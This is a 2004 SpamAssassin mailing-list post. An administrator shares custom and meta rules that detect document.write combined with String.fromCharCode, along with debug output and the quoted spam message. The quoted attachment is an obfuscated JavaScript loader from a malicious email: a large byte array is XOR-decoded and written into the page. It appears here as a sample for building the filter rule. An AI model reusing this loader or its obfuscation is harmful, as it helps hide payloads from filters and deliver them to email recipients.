Here's debug as you can see it still didn't trigger the custom rule. I have
other custom rules just not meta ones. Tried the full with and without the \
on the periods.
full __SPAMSIGNS1 /document.write/
full __SPAMSIGNS2 /String.fromCharCode/
meta SPAMSIGNS12 (__SPAMSIGNS1 && __SPAMSIGNS2)
describe SPAMSIGNS12 Spam signs generates html from character codes
tflags SPAMSIGNS12 learn
score SPAMSIGNS12 5.0
also tried
full __SPAMSIGNS1 /document\.write/
full __SPAMSIGNS2 /String\.fromCharCode/
meta SPAMSIGNS12 (__SPAMSIGNS1 && __SPAMSIGNS2)
describe SPAMSIGNS12 Spam signs generates html from character codes
tflags SPAMSIGNS12 learn
score SPAMSIGNS12 5.0
debug: using "/usr/share/spamassassin" for default rules dir
debug: using "/etc/mail/spamassassin" for site rules dir
debug: using "/home/blarson/.spamassassin" for user state dir
debug: using "/home/blarson/.spamassassin/user_prefs" for user prefs file
debug: bayes: 23671 tie-ing to DB file R/O /var/spamassassin/bayes_toks
debug: bayes: 23671 tie-ing to DB file R/O /var/spamassassin/bayes_seen
debug: bayes: found bayes db version 2
debug: Score set 3 chosen.
debug: Initialising learner
debug: received-header: parsed as [ ip=82.81.17.236
rdns=bzq-82-81-17-236.red.bezeqint.net helo=82.81.17.236 by=ns1.compu.net
ident= ]
debug: is Net::DNS::Resolver available? yes
debug: trying (3) amazon.com...
debug: looking up MX for 'amazon.com'
debug: MX for 'amazon.com' exists? 1
debug: MX lookup of amazon.com succeeded => Dns available (set dns_available
to hardcode)
debug: is DNS available? 1
debug: IP is reserved, not looking up PTR
debug: received-header: parsed as [ ip=192.168.221.31 rdns=192.168.221.31
helo=DCCBAHAIEGA by=82.81.17.236 ident= ]
debug: received-header: relay 82.81.17.236 trusted? no
debug: received-header: relay 192.168.221.31 trusted? no
debug: running header regexp tests; score so far=0
debug: running body-text per-line regexp tests; score so far=0.778
debug: bayes corpus size: nspam = 13494, nham = 15503
debug: uri tests: Done uriRE
debug: tokenize: header tokens for *p = "U*brighter D*dynamicdesigns.co.uk
D*co.uk D*uk"
debug: tokenize: header tokens for *M = " OEA0066 OEBc1a2 OECa38a50d5
DCCBAHAIEGA "
debug: tokenize: header tokens for *F = "U*brighter D*dynamicdesigns.co.uk
D*co.uk D*uk"
debug: tokenize: header tokens for To = "U*mailer-daemon D*compu.net D*net"
debug: tokenize: header tokens for MIME-Version = ""
debug: tokenize: header tokens for X-Security = "message sanitized on
ns1.compu.net See
http://www.impsec.org/email-tools/sanitizer-intro.html for
details. $Revision: 1.141 $Date: 2004-03-01 06:10:03-08 "
debug: tokenize: header tokens for *c = "multipart/mixed; ----=_ NHxtPHrt
_ HHH _ HHHH _ HHHHHHHH . HHHHHHHH"
debug: tokenize: header tokens for X-Priority = "3"
debug: tokenize: header tokens for *r = " unknown (HELO DCCBAHAIEGA)
(192.168.221) by 82.81.17 ; "
debug: tokenize: header tokens for *r = " unknown (HELO DCCBAHAIEGA)
(192.168.221) by 82.81.17 ; 82.81.17
(bzq-82-81-17-236.red.bezeqint.net [82.81.17]) by ns1.compu.net
(8.11.6/8.11.6) <mailer-daemon@compu.net>; "
debug: bayes token 'HTo:U*mailer-daemon' => 0.978
debug: bayes token 'H*r:sk:mailer-' => 0.978
debug: bayes token 'DEFANGED' => 0.0238197170447493
debug: bayes token 'sk:_NextPa' => 0.0406818434939027
debug: bayes token 'H*M:OEA0066' => 0.958
debug: bayes token 'H*F:U*brighter' => 0.958
debug: bayes token 'H*M:DCCBAHAIEGA' => 0.958
debug: bayes token 'H*M:OEBc1a2' => 0.958
debug: bayes token 'H*F:D*dynamicdesigns.co.uk' => 0.958
debug: bayes token 'UD:C75BCB14' => 0.958
debug: bayes token 'H*p:D*dynamicdesigns.co.uk' => 0.958
debug: bayes token 'H*p:U*brighter' => 0.958
debug: bayes token 'H*r:DCCBAHAIEGA' => 0.958
debug: bayes token 'plain' => 0.0541007075698413
debug: bayes token 'sk:quoted-' => 0.0618448015257707
debug: bayes token 'sk:Content' => 0.063710858723877
debug: bayes token 'H*c:mixed' => 0.0826181380661401
debug: bayes token 'charset' => 0.082986995828258
debug: bayes token 'Content-Type' => 0.0891485598654711
debug: bayes token 'H*p:D*uk' => 0.900344551675937
debug: bayes token 'H*p:D*co.uk' => 0.89486488160447
debug: bayes token 'attach' => 0.115952531781332
debug: bayes token 'attachment' => 0.118586675659779
debug: bayes token 'skipped' => 0.128467128654053
debug: bayes token 'text' => 0.133379958159363
debug: bayes token 'kick' => 0.135384708297681
debug: bayes token 'html' => 0.137455505254515
debug: bayes: score = 0.524858832184474
debug: bayes: 23671 untie-ing
debug: bayes: 23671 untie-ing db_toks
debug: bayes: 23671 untie-ing db_seen
debug: Razor2 is not available
debug: running raw-body-text per-line regexp tests; score so far=0.878
debug: running uri tests; score so far=0.878
debug: uri tests: Done uriRE
debug: running full-text regexp tests; score so far=0.878
debug: Razor2 is not available
debug: DCCifd is not available: no r/w dccifd socket found.
debug: executable for dccproc was found at /usr/local/bin/dccproc
debug: DCC is available: /usr/local/bin/dccproc
debug: entering helper-app run mode
debug: DCC: got response: X-DCC-sonic.net-Metrics: ns1.compu.net 1117;
Body=3 Fuz1=3 Fuz2=4
debug: leaving helper-app run mode
debug: Pyzor is not available: pyzor not found
debug: all '*From' addrs: brighter@dynamicdesigns.co.uk
debug: all '*To' addrs: mailer-daemon@compu.net
debug: forged-HELO: from=bezeqint.net helo=82.81.17.236 by=compu.net
debug: forged-HELO: mismatch on HELO: '82.81.17.236' != 'bezeqint.net'
debug: forged-HELO: from=192.168.221.31 helo=dccbahaiega by=82.81.17.236
debug: forged-HELO: mismatch on from: 'bezeqint.net' != '82.81.17.236'
debug: DNS MX records found: 1
debug: running meta tests; score so far=0.878
debug: auto-learn? ham=2, spam=8, body-hits=0.1, head-hits=0.778
debug: auto-learn: currently using scoreset 3. recomputing score based on
scoreset 1.
debug: Score set 1 chosen.
debug: auto-learn: original score: 2.09, recomputed score: 0.843
debug: Score set 3 chosen.
debug: auto-learn? no: learner indicated spam (3 > 1)
debug: is spam? score=5.09 required=5
tests=BAYES_50,HTML_MESSAGE,PRIORITY_NO_NAME,TO_ADDRESS_EQ_REAL
Received: from localhost by ns1.compu.net
with SpamAssassin (2.63 2004-01-11);
Sat, 13 Mar 2004 19:01:12 -0600
From: "demeter" <brighter@dynamicdesigns.co.uk>
To: "mailer-daemon@compu.net" <mailer-daemon@compu.net>
Subject: [Possible Spam] you will get a kick out of this
Date: Mon, 15 Mar 2004 18:02:38 -0800
Message-Id: <006601c40afa$c1a2f300$a38a50d5@DCCBAHAIEGA>
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on ns1.compu.net
X-Spam-Status: Yes, hits=5.1 required=5.0 tests=BAYES_50=3,HTML_MESSAGE=0.1,
PRIORITY_NO_NAME=1.212,TO_ADDRESS_EQ_REAL=0.778 autolearn=no
version=2.63
X-Spam-Level: *****
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------=_4053AED8.C4D7E8C4"
This is a multi-part message in MIME format.
------------=_4053AED8.C4D7E8C4
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Spam detection software, running on the system "ns1.compu.net", has
identified this incoming email as possible spam. The original message
has been attached to this so you can view it (if it isn't spam) or block
similar future email. If you have any questions, see
blarson@compu.net for details.
Content preview: ------=_NextPart_001_0064_01C40B01.C75BCB14
Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding:
quoted-printable text part ------=_NextPart_001_0064_01C40B01.C75BCB14
Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding:
quoted-printable [...]
Content analysis details: (5.1 points, 5.0 required)
pts rule name description
---- ---------------------- ------------------------------------------------
--
0.8 TO_ADDRESS_EQ_REAL To: repeats address as real name
3.0 BAYES_50 BODY: Bayesian spam probability is 50 to 56%
[score: 0.5249]
0.1 HTML_MESSAGE BODY: HTML included in message
1.2 PRIORITY_NO_NAME Message has priority setting, but no X-Mailer
The original message was not completely plain text, and may be unsafe to
open with some email clients; in particular, it may contain a virus,
or confirm that your address can receive spam. If you wish to view
it, it may be safer to save it to a file and open it with an editor.
------------=_4053AED8.C4D7E8C4
Content-Type: message/rfc822; x-spam-type=original
Content-Description: original message before SpamAssassin
Content-Disposition: attachment
Content-Transfer-Encoding: 8bit
Return-Path: <brighter@dynamicdesigns.co.uk>
Received: from 82.81.17.236 (bzq-82-81-17-236.red.bezeqint.net
[82.81.17.236])
by ns1.compu.net (8.11.6/8.11.6) with SMTP id i2DNWGf10084
for <mailer-daemon@compu.net>; Sat, 13 Mar 2004 17:32:19 -0600
Received: from unknown (HELO DCCBAHAIEGA) (192.168.221.31)
by 82.81.17.236 with SMTP; 15 Mar 2004 18:02:46 -0800
Message-ID: <006601c40afa$c1a2f300$a38a50d5@DCCBAHAIEGA>
From: "demeter" <brighter@dynamicdesigns.co.uk>
To: "mailer-daemon@compu.net" <mailer-daemon@compu.net>
Subject: you will get a kick out of this
Date: Mon, 15 Mar 2004 18:02:38 -0800
MIME-Version: 1.0
X-Security: message sanitized on ns1.compu.net
See
http://www.impsec.org/email-tools/sanitizer-intro.html for details. $Revision: 1.141 $Date: 2004-03-01 06:10:03-08
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0063_01C40B01.C75BCB14"
X-Priority: 3
Status:
This is a multi-part message in MIME format.
------=_NextPart_000_0063_01C40B01.C75BCB14
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0064_01C40B01.C75BCB14"
------=_NextPart_001_0064_01C40B01.C75BCB14
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
text part
------=_NextPart_001_0064_01C40B01.C75BCB14
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<DEFANGED_META http-equiv=3DContent-Type content=3D"text/html;
charset=3Dutf-8">
<!-- <DEFANGED_STYLE> --> </DEFANGED_STYLE>
</HEAD>
<BODY><B>This message</B> has an attach that you will be interest=
ed in</BODY></HTML>
------=_NextPart_001_0064_01C40B01.C75BCB14--
------=_NextPart_000_0063_01C40B01.C75BCB14
X-Content-Security: [ns1.compu.net] original Content-Type was text/html;
Content-Type: APPLICATION/DEFANGED; name="ascend.10100DEFANGED-html"
Content-Disposition: attachment; filename="ascend.10100DEFANGED-html"
Content-Transfer-Encoding: quoted-printable
<DEFANGED_script language=3D"JavaScript">
Renville =3D new Array(241,
234,231,189,165,240,226,246,136,208,6,
226,61,196,136,240,68,12,142,10,52,
116,227,92,213,235,151,113,22,56,234,
230,206,135,29,68,204,92,237,98,89,
92,132,38,149,38,164,155,113,253,17,
93,59,253,249,202,229,218,253,178,177,
240,186,167,149,153,184,248,62,202,63,
242,143,241,29,123,237,116,92,12,177,
73,129,249,219,118,20,33,178,183,217,
194,18,94,205,14,162,51,22,78,230,
66,145,105,183,129,113,243,17,64,118,
176,211,229,187,143,237,241,246,168,233,
173,128,146,235,191,104,156,104,201,137,
186,1,29,229,111,87,10,225,16,218,
250,197,21,123,106,167,228,204,142,26,
87,199,19,237,63,0,84,159,45,147,
36,249,200,123,253,13,20,57,189,208,
224,186,152,240,160,176,150,143,254,223,
204,181,248,43,155,104,220,130,169,31,
7,161,62,112,56,255,117,186,223,219,
89,35,19,247,136,226,173,56,121,231,
105,239,26,42,104,203,9,193,78,136,
160,16,152,47,33,93,135,159,216,154,
202,139,215,208,155,233,143,161,184,165,
142,67,173,79,134,169,209,107,119,209,
32,106,59,154,12,180,205,186,81,63,
106,248,162,194,140,7,14,149,1,191,
98,104,48,215,56,193,103,171,157,122,
252,94,66,122,187,209,248,176,152,239,
188,175,182,166,160,155,220,230,181,103,
135,115,155,197,183,123,116,179,48,9,
78,253,12,134,227,129,125,76,116,226,
230,147,187,60,101,137,102,142,10,32,
26,168,7,172,67,231,160,82,178,55,
40,92,254,237,197,146,162,153,143,153,
128,133,143,172,185,171,252,101,138,114,
214,220,180,117,119,209,69,25,39,144,
121,213,221,178,84,61,118,149,129,141,
163,49,124,236,14,155,19,69,108,162,
13,182,58,232,146,114,252,23,94,37,
241,207,178,216,224,241,242,179,177,165,
167,136,146,184,248,104,141,111,210,130,
230,31,12,191,102,86,16,171,12,150,
229,151,119,3,107,245,231,235,164,67,
0,153,30,237,124,22,83,145,45,220,
36,242,214,35,198,43,37,57,142,250,
222,134,165,131,195,223,240,136,138,188,
220,196,148,79,200,72,224,199,205,114,
103,142,10,117,55,148,105,213,221,179,
89,37,118,142,139,248,194,32,117,236,
2,239,5,42,111,203,27,164,72,131,
212,85,215,49,64,88,144,131,163,179,
133,163,246,173,236,230,190,209,241,143,
230,123,200,96,202,142,243,83,15,161,
99,92,16,171,73,135,168,197,36,23,
57,185,176,141,129,28,92,198,92,242,
126,70,124,173,120,209,54,247,214,61,
225,10,26,124,227,157,185,247,212,136,
207,210,153,133,238,174,178,193,250,95,
160,68,232,199,205,114,103,163,67,120,
48,255,107,186,170,189,74,62,27,218,
206,249,170,54,98,236,0,233,50,7,
73,155,115,193,58,232,146,114,252,23,
94,37,241,207,178,216,224,241,242,179,
177,165,167,136,146,184,248,104,141,111,
210,130,230,31,12,191,102,86,16,171,
12,150,229,151,119,3,107,245,231,235,
164,67,0,153,30,237,124,22,83,145,
45,220,36,242,214,35,223,34,50,75,
151,250,200,245,189,130,207,214,158,233,
153,167,179,165,141,74,166,85,134,179,
219,29,116,214,67,114,115,213,106,186,
216,219,94,36,24,249,226,195,128,0,
64,146,14,140,19,40,127,203,27,164,
67,231,181,81,222,67,52,81,155,236,
201,245,162,130,214,179,236,230,168,128,
146,241,228,55,199,113,152,234,158,1,
66,163,97,85,23,184,66,200,168,152,
125,31,34,178,182,143,220,79,86,198,
64,187,124,6,85,135,39,147,59,229,
215,91,212,83,80,41,238,157,172,166,
131,183,231,174,242,252,236,209,180,202,
136,69,177,33,255,168,193,115,117,163,
87,112,40,154,127,213,221,179,87,34,
19,218,206,229,183,32,114,232,96,139,
123,54,26,191,26,160,80,130,184,61,
198,44,47,57,147,234,207,157,203,236,
163,175,255,175,161,129,136,187,230,36,
152,63,171,237,168,77,18,226,108,80,
25,177,17,215,233,158,118,5,51,165,
230,147,222,21,95,199,90,239,63,10,
86,132,58,220,36,228,178,91,162,83,
80,41,252,159,255,188,144,168,191,177,
229,235,240,211,157,165,178,121,141,103,
155,197,252,73,70,243,58,22,81,168,
91,130,164,152,116,20,55,165,169,204,
150,27,30,203,71,181,115,31,21,142,
50,206,55,247,196,45,162,83,63,92,
132,145,228,161,135,161,160,173,149,135,
154,170,174,136,208,67,173,83,227,219,
187,92,12,191,47,95,17,177,88,203,
182,212,104,79,91,221,248,207,144,77,
61,163,18,173,46,91,55,225,116,131,
116,249,249,23,174,1,18,39,211,181,
176,183,152,243,143,153,236,171,188,209,
241,143,230,105,154,63,171,237,168,95,
64,189,13,51,66,189,94,203,135,241,
36,19,36,233,201,167,222,17,66,151,
35,197,96,21,26,138,36,136,97,169,
201,63,254,6,6,109,252,129,176,180,
202,165,240,246,182,244,236,135,136,241,
170,49,199,46,209,144,227,19,80,234,
110,93,27,173,65,156,228,159,125,3,
120,181,173,215,205,9,31,205,65,161,
57,75,82,159,37,141,36,249,134,120,
255,12,22,124,211,181,245,186,159,191,
241,246,188,175,242,192,157,187,230,36,
152,63,171,237,153,55,14,172,98,86,
26,166,18,248,128,246,18,77,121,191,
176,192,142,77);
parrot =3D new Array(205,
130,147,208,201,206,239,252,133,218,11,
232,1,166,231,148,61,50,131,0,57,
126,223,44,245,138,251,24,113,86,215,
196,173,226,115,48,169,46,207,92,101,
58,235,72,225,6,199,244,29,146,99,
96,25,222,191,140,213,234);
integration =3D 1195;
chanting =3D 58;
var vary =3D "";
for(multiplier =3D 0; multiplier < integration; multiplier++)
vary =3D vary + String.fromCharCode(Renville[multiplier] ^ parrot=
[multiplier % chanting]);
document.write(vary);
</script>
------=_NextPart_000_0063_01C40B01.C75BCB14--
------------=_4053AED8.C4D7E8C4--
------------=_4053AED8.C4D7E8C4--
----- Original Message -----
From: "Loren Wilton" <lwilton@earthlink.net>
To: <spamassassin-users@incubator.apache.org>
Sent: Saturday, March 13, 2004 6:55 PM
Subject: Re: First meta rule
> You may have to use 'full' instead of rawbody. I suspect that code is in
an
> attachment that is creating a gif or some such? I htink attachments,
> possibly including that sort, get stripped out of rawbody.
>
> Loren